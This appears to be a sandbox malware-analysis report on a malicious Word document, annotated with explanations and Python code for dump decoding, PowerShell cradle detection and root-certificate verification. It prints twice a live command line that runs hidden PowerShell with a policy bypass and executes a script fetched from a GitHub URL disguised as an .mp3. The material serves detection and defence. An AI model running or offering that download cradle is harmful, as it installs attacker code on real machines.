Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o................n.k.....-!.............................}..v....(.!.....0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{....... .......#o.k......T.............................}..v.....1!.....0...............h.T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{................n.k....p2!.............................}..v.....2!.....0.................T.............X...............Jump to behavior
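The fragments above were picked out by hand. The following is an added example, not part of the Joe Sandbox report, of recovering them mechanically from any Console Write dump in this format. It assumes only what the dump shows: ASCII text stored as UTF-16LE with the NUL bytes rendered as dots. The sample lines are copied from the entries above; the token filter (four letters minimum, a dot kept only inside a word) is a heuristic chosen for this example, not something the report defines.

```python
"""Recover readable strings from sandbox Console Write dumps of a UTF-16LE console buffer.

ASCII text in UTF-16LE is one byte of text followed by 0x00; the dump prints every
non-printable byte as '.', so "At line:3" appears as "A.t. .l.i.n.e.:.3" surrounded by
padding and pointer bytes from the rest of the buffer.
"""
import re
from typing import List

# A candidate string starts with a letter and keeps a '.' only when a letter or digit follows
# it, so "end.vbs" survives while a run of NUL padding ends the token.
TOKEN = re.compile(r"""[A-Za-z](?:[A-Za-z0-9 :"'\-_\\/]|\.(?=[A-Za-z0-9]))*""")
MIN_LETTERS = 4   # heuristic: drops the 1-3 letter residue ("hT", "pL") that pointer bytes produce


def recover_strings(dump_line: str) -> List[str]:
    """Readable fragments of one dump line, in the order they sit in the buffer."""
    hits = []
    for parity in (0, 1):                     # the text may start on an even or an odd byte offset
        decoded = dump_line[parity::2]        # keep every second character: the text bytes
        for m in TOKEN.finditer(decoded):
            token = m.group().strip()
            if sum(c.isalpha() for c in token) >= MIN_LETTERS:
                hits.append((parity + 2 * m.start(), token))
    return [token for _, token in sorted(hits)]


def recover_all(dump_lines) -> List[str]:
    """Fragments across many lines, e.g. all Console Write entries of one process."""
    out: List[str] = []
    for line in dump_lines:
        out.extend(recover_strings(line))
    return out


# Sample input: six of the Console Write entries from this report, with the "Source:" prefix
# and the page's link text removed.
SAMPLE_DUMP = [
    "................y=.w....w....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n......W......0...............h.T.....4.......X...............",
    '................y=.w............A.t. .l.i.n.e.:.3. .c.h.a.r.:.1.8...............}..v....(?......0...............h.T.....".......X...............',
    '................y=.w............O.u.t.F.i.l.e. .".e.n.d...v.b.s."...............}..v....pL......0...............h.T.....".......X...............',
    "................y=.w....'.......n.n.o.t. .f.i.n.d. .t.h.e. .f.i.l.e. .s.p.e.c.i.f.i.e.d...!.....0...............h.T.....:.......X...............",
    '................y=.w....3.......A.t. .l.i.n.e.:.7. .c.h.a.r.:.1.4...............}..v......!.....0...............h.T.....".......X...............',
    "................y=.w....o....... . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0...............h.T.....<.......X...............",
]

if __name__ == "__main__":
    for fragment in recover_all(SAMPLE_DUMP):
        print(fragment)
```

Because both byte parities are tried, the function does not need to know where the text starts inside the buffer; the parity that does not carry the text yields only dots and single letters, which the length filter discards. Genuine strings shorter than four letters are lost by that filter, which is an acceptable trade for error records and file names.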
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')
Reading: powershell.exe accepts any unambiguous prefix of a parameter name, so the switches expand to -NoProfile -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass; the execution-policy override applies to this process only and needs no elevation. DownloadString returns the HTTP response body as a string and IEX (Invoke-Expression) evaluates it, so the .mp3 extension is cosmetic and this stage writes nothing to disk. The github.com/<user>/<repo>/raw/... form of the URL is answered with a redirect to raw.githubusercontent.com over HTTPS, which WebClient follows, so only the first request is visible in clear text and the script body travels over TLS; the operator can also swap 5.mp3 in the repository without re-sending the document. WebClient sends no User-Agent header unless the script sets one, which is the simplest network-side indicator for this cradle.
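As an added example, not taken from the report or from any vendor rule set, here is detection logic for the process-creation event above, run over three constructed events: the report's own command line, a benign administrative launch, and an encoded-command variant pointing at the reserved domain example.invalid. The rule names, the parameter-prefix table and the extension list are this example's own choices.

```python
"""Triage of process-creation events for an Office-spawned PowerShell download cradle."""
import base64
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlparse

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe", "mspub.exe"}
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                  "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}

# powershell.exe accepts any unambiguous, case-insensitive prefix of a parameter name, so
# -NoP, -NonI, -W and -Exec are all legal spellings; normalise before matching on them.
PS_PARAMETERS = ["NoProfile", "NonInteractive", "WindowStyle", "ExecutionPolicy", "EncodedCommand",
                 "Command", "NoLogo", "NoExit", "File", "Version", "Sta", "Mta", "InputFormat", "OutputFormat"]
PS_ALIASES = {"e": "EncodedCommand", "ec": "EncodedCommand", "enc": "EncodedCommand", "c": "Command"}
VALUE_PARAMETERS = {"WindowStyle", "ExecutionPolicy", "Version", "InputFormat", "OutputFormat"}

CRADLE_PATTERNS = {
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "webclient_download": re.compile(r"net\.webclient|\.download(?:string|file|data)\s*\(", re.I),
    "web_request_cmdlet": re.compile(r"\b(?:invoke-webrequest|iwr|wget|curl|invoke-restmethod|irm|start-bitstransfer)\b", re.I),
}
URL_RE = re.compile(r"""https?://[^\s'"()]+""", re.I)
NON_SCRIPT_EXTENSIONS = (".mp3", ".mp4", ".wav", ".jpg", ".jpeg", ".png", ".gif", ".pdf", ".txt")


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass
class Finding:
    rules: List[str] = field(default_factory=list)
    urls: List[str] = field(default_factory=list)
    ps_flags: Dict[str, object] = field(default_factory=dict)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def canonical_flag(token: str) -> Optional[str]:
    """'-NoP' -> 'NoProfile' etc.; None when not a flag or ambiguous (PowerShell rejects those too)."""
    if not token.startswith(("-", "/")):
        return None
    name = token[1:].lower()
    if name in PS_ALIASES:
        return PS_ALIASES[name]
    matches = [p for p in PS_PARAMETERS if p.lower().startswith(name)]
    return matches[0] if len(matches) == 1 else None


def _arguments(command_line: str) -> List[str]:
    """Drop the executable (possibly a quoted path with spaces) and split the rest on whitespace."""
    if command_line.startswith('"'):
        end = command_line.find('"', 1)
        rest = command_line[end + 1:] if end > 0 else ""
    else:
        parts = command_line.split(None, 1)
        rest = parts[1] if len(parts) > 1 else ""
    return rest.split()


def parse_powershell_command_line(command_line: str) -> Tuple[Dict[str, object], str]:
    """Return (normalised flags, script payload); -EncodedCommand payloads are base64/UTF-16LE decoded."""
    tokens, flags, i = _arguments(command_line), {}, 0
    while i < len(tokens):
        name = canonical_flag(tokens[i])
        if name is None:                      # first non-flag token: everything from here is the script
            break
        if name in ("Command", "File", "EncodedCommand"):
            rest = " ".join(tokens[i + 1:])
            flags[name] = rest
            if name == "EncodedCommand":
                try:
                    rest = base64.b64decode(rest).decode("utf-16-le")
                except (ValueError, UnicodeDecodeError):
                    pass                      # keep the raw value; the regexes still see it
            return flags, rest
        if name in VALUE_PARAMETERS:
            flags[name] = tokens[i + 1] if i + 1 < len(tokens) else ""
            i += 2
        else:
            flags[name] = True
            i += 1
    return flags, " ".join(tokens[i:])


def triage(event: ProcessEvent) -> Finding:
    f = Finding()
    parent, child = _basename(event.parent_image), _basename(event.image)
    if parent in OFFICE_PARENTS and child in SHELL_CHILDREN:
        f.rules.append("office_spawns_shell")
    if child not in ("powershell.exe", "pwsh.exe"):
        return f
    f.ps_flags, payload = parse_powershell_command_line(event.command_line)
    if (str(f.ps_flags.get("WindowStyle", "")).lower() == "hidden"
            and str(f.ps_flags.get("ExecutionPolicy", "")).lower() in ("bypass", "unrestricted")):
        f.rules.append("ps_hidden_policy_bypass")
    hits = {k for k, rx in CRADLE_PATTERNS.items() if rx.search(payload)}
    f.urls = URL_RE.findall(payload)
    if f.urls and "invoke_expression" in hits and len(hits) > 1:
        f.rules.append("ps_download_cradle")          # remote content flows straight into IEX
    elif f.urls and hits:
        f.rules.append("ps_web_request")
    if "invoke_expression" in hits and any(
            urlparse(u).path.lower().endswith(NON_SCRIPT_EXTENSIONS) for u in f.urls):
        f.rules.append("script_disguised_as_media")   # an .mp3 that gets executed is not audio
    return f


# Constructed sample events: the first reproduces the command line from this report, the
# second is a benign administrative launch, the third an encoded-command variant.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.jpg')".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient)"
                 ".DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -File C:\scripts\inventory.ps1'),
    ProcessEvent(r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 f"powershell.exe -w hidden -ec {ENCODED}"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(_basename(ev.parent_image), "->", _basename(ev.image), triage(ev).rules)
```

The prefix expansion is the part most rules get wrong: a literal match on "-ExecutionPolicy Bypass" misses "-Exec Bypass", "-ep bypass" and every other legal spelling, while normalising first makes one comparison cover all of them. The extension check is deliberately tied to IEX: fetching an .mp3 is normal, evaluating its bytes as script is not.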
Source: RfORrHIRNe.doc OLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$ORrHIRNe.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRF7F4.tmp
Source: classification engine Classification label: mal92.expl.winDOC@3/10@3/3
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Reading: mscorlib 2.0.0.0 means the PowerShell host in this analysis is Windows PowerShell 2.0 on CLR 2.0. That host has no AMSI, no script block logging and none of the cmdlets introduced in PowerShell 3.0, so both the telemetry available and the behaviour observed differ from what the same command line produces on a patched Windows 10 or 11 client.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: powershell.exe, 00000002.00000002.440796081.000000001CC50000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: RfORrHIRNe.doc OLE document summary: title field not present or empty
Source: ~WRF{A8188D20-C63E-41BC-839A-5E99E4F44AC7}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{A8188D20-C63E-41BC-839A-5E99E4F44AC7}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{A8188D20-C63E-41BC-839A-5E99E4F44AC7}.tmp.0.dr OLE document summary: edited time not present or 0
Source: ~DFB0DD1817E66C3CA2.TMP.0.dr OLE document summary: title field not present or empty
Source: ~DFB0DD1817E66C3CA2.TMP.0.dr OLE document summary: author field not present or empty
Source: ~DFB0DD1817E66C3CA2.TMP.0.dr OLE document summary: edited time not present or 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.436424156.0000000002937000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000002.00000002.436424156.0000000002937000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.436424156.0000000002937000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000002.00000002.436424156.0000000002937000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000002.00000002.436424156.0000000002937000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.436424156.0000000002937000.00000004.00000040.sdmp
Reading: the .pdb strings are the symbol search paths the .NET runtime probed while building stack traces for the errors in the console output; they are a side effect of the failed stage, not an indicator of the sample.
Source: ~WRF{A8188D20-C63E-41BC-839A-5E99E4F44AC7}.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Suspicious powershell command line found
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Check: that key is the machine-wide Trusted Root store, so whatever certificate the Blob holds is trusted by every user and process on the host, and a PowerShell process that has just fetched remote code writing there deserves verification rather than a "stores large binary data" label. Writes to this key are also seen when Windows' automatic root update adds a root it needed to complete a chain (the TLS chain behind the GitHub redirect is a candidate), so the question is which certificate it is: export the Blob, extract the DER certificate, confirm its SHA-1 thumbprint equals the key name, and check that thumbprint against the public CA roots Microsoft distributes. A root that is not a known public CA, installed by this process, would let the operator intercept TLS and vouch for signed code on the host. The write also shows the sample ran with administrative rights in this analysis; under a standard user HKLM\SOFTWARE is not writable and this entry would not appear.
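An added example, not from the report, of the check described above: parsing the registry Blob value and comparing the certificate's thumbprint with the key name it is stored under. The record layout it assumes (DWORD property id, DWORD reserved, DWORD length, data, little-endian; property 32 holds the DER certificate, property 3 the SHA-1 hash CryptoAPI cached) is the serialized CryptoAPI store-entry format, which Microsoft does not formally document. The sample blob is built around placeholder bytes rather than a real certificate, and read_blob_from_registry is only usable on a Windows host with access to the key.

```python
"""Verify a CryptoAPI store entry ('Blob' registry value) against the key it lives under."""
import hashlib
import struct
from typing import Dict

# Serialized store entry: repeated records of DWORD prop_id | DWORD reserved | DWORD length | data.
# Assumption for this example: property 32 is the DER certificate, property 3 the cached SHA-1.
CERT_SHA1_HASH_PROP_ID = 3
CERT_CERT_PROP_ID = 32


def parse_cert_blob(blob: bytes) -> Dict[int, bytes]:
    """Split the blob into {prop_id: data}; raise ValueError on a truncated record."""
    props, pos = {}, 0
    while pos < len(blob):
        if len(blob) - pos < 12:
            raise ValueError(f"truncated record header at offset {pos}")
        prop_id, _reserved, length = struct.unpack_from("<III", blob, pos)
        pos += 12
        if pos + length > len(blob):
            raise ValueError(f"record {prop_id} at offset {pos - 12} runs past the end of the blob")
        props[prop_id] = blob[pos:pos + length]
        pos += length
    return props


def is_well_formed(blob: bytes) -> bool:
    try:
        parse_cert_blob(blob)
        return True
    except ValueError:
        return False


def check_root_store_entry(key_name: str, blob: bytes) -> dict:
    """Extract the certificate and report whether its SHA-1 agrees with the key name and cached hash."""
    props = parse_cert_blob(blob)
    der = props.get(CERT_CERT_PROP_ID)
    if der is None:
        raise ValueError("blob carries no certificate record (property 32)")
    sha1 = hashlib.sha1(der).hexdigest().upper()
    cached = props.get(CERT_SHA1_HASH_PROP_ID, b"").hex().upper()
    return {
        "der": der,
        "sha1": sha1,
        "sha256": hashlib.sha256(der).hexdigest().upper(),
        "matches_key_name": sha1 == key_name.strip().upper(),
        "matches_cached_hash": cached in ("", sha1),
    }


def read_blob_from_registry(thumbprint: str) -> bytes:
    """Windows only: fetch the Blob value of a machine Trusted Root store entry by thumbprint."""
    import winreg
    path = r"SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates" + "\\" + thumbprint
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
        value, _type = winreg.QueryValueEx(key, "Blob")
        return value


# Constructed sample: a blob serialized the same way, around placeholder bytes that stand in
# for a DER certificate (an exported real Blob is passed to check_root_store_entry as-is).
def build_blob(der: bytes) -> bytes:
    def record(prop_id: int, data: bytes) -> bytes:
        return struct.pack("<III", prop_id, 1, len(data)) + data
    return record(CERT_SHA1_HASH_PROP_ID, hashlib.sha1(der).digest()) + record(CERT_CERT_PROP_ID, der)


FAKE_DER = b"\x30\x82\x01\x00" + bytes(range(256))   # SEQUENCE header plus filler, not a real certificate
SAMPLE_BLOB = build_blob(FAKE_DER)
SAMPLE_KEY = hashlib.sha1(FAKE_DER).hexdigest().upper()

if __name__ == "__main__":
    result = check_root_store_entry(SAMPLE_KEY, SAMPLE_BLOB)
    print(result["sha1"], result["matches_key_name"], result["matches_cached_hash"])
```

With the extracted DER in hand, the remaining step is outside this example: decode it (openssl x509 -inform DER -noout -subject -issuer -fingerprint) and compare the subject and thumbprint with Microsoft's published trusted root list. A mismatch between the key name and the certificate's real hash, or between the cached property 3 and the DER, means the entry was not written by CryptoAPI's normal path and should be treated as tampering.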
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX (54 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (25 identical entries)
Reading: NOOPENFILEERRORBOX is SetErrorMode(SEM_NOOPENFILEERRORBOX), which stops the loader from showing a dialog when a DLL cannot be found. Office and every .NET host set it routinely; on its own it carries no signal.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1180 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000002.00000002.435883601.000000000033B000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation

MITRE ATT&CK Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Command and Scripting Interpreter1 | Path Interception | Process Injection1 | Masquerading1 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scripting12 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Modify Registry1 | LSASS Memory | Process Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Exploitation for Client Execution13 | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion21 | Security Account Manager | Virtualization/Sandbox Evasion21 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | PowerShell1 | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol3 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting12 | LSA Secrets | File and Directory Discovery2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery12 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
RfORrHIRNe.doc | 49% | Virustotal |
RfORrHIRNe.doc | 100% | Avira | HEUR/Macro.Agent
RfORrHIRNe.doc | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\~DFB0DD1817E66C3CA2.TMP | 100% | Avira | HEUR/Macro.Agent
C:\Users\user\AppData\Local\Temp\~DFB0DD1817E66C3CA2.TMP | 100% | Joe Sandbox ML |

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
raw.githubusercontent.com | 0% | Virustotal |

URLs

Source | Detection | Scanner | Label
http://github.co | 0% | Virustotal |
http://github.co | 0% | Avira URL Cloud | safe
https://render.githubusercontent.com | 0% | Virustotal |
https://render.githubusercontent.com | 0% | Avira URL Cloud | safe
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
https://raw.githubusercontent.com/ssbb36/stv/main/5.mp3 | 0% | Virustotal |
https://raw.githubusercontent.com/ssbb36/stv/main/5.mp3 | 0% | Avira URL Cloud | safe
https://raw.githubuserco | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
https://notebooks.githubusercontent.com | 0% | Avira URL Cloud | safe
https://raw.githubusercontent.com | 0% | Avira URL Cloud | safe
https://viewscreen.githubusercontent.com | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
https://github.c | 0% | Avira URL Cloud | safe
